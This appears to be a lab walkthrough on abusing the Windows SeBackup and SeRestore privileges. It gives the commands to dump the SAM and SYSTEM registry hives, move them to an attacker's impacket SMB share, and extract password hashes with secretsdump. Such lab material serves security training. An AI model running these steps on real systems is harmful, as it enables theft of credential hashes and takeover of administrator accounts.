The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.
copying the SAM and SYSTEM registry hives to extract the local Administrator's password hash.
This account is part of the "Backup Operators" group, which by default is granted the SeBackup and SeRestore privileges. We will need to open a command prompt using the "Open as administrator" option to use these privileges. We will be asked to input our password again to get an elevated console:
we can check our privileges with the following command:
whoami /priv

**`SeChangeNotifyPrivilege Bypass traverse checking Enabled`**
To backup the SAM and SYSTEM hashes, we can use the following commands:
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

This will create a couple of files with the registry hives content. We can now copy these files to our attacker machine using SMB or any other available method. For SMB, we can use impacket's smbserver.py to start a simple SMB server with a network share in the current directory of our AttackBox
impacket-smbserver -smb2support smb .


And use impacket to retrieve the users' password hashes:
impacket-secretsdump -sam sam.hive -system system.hive Local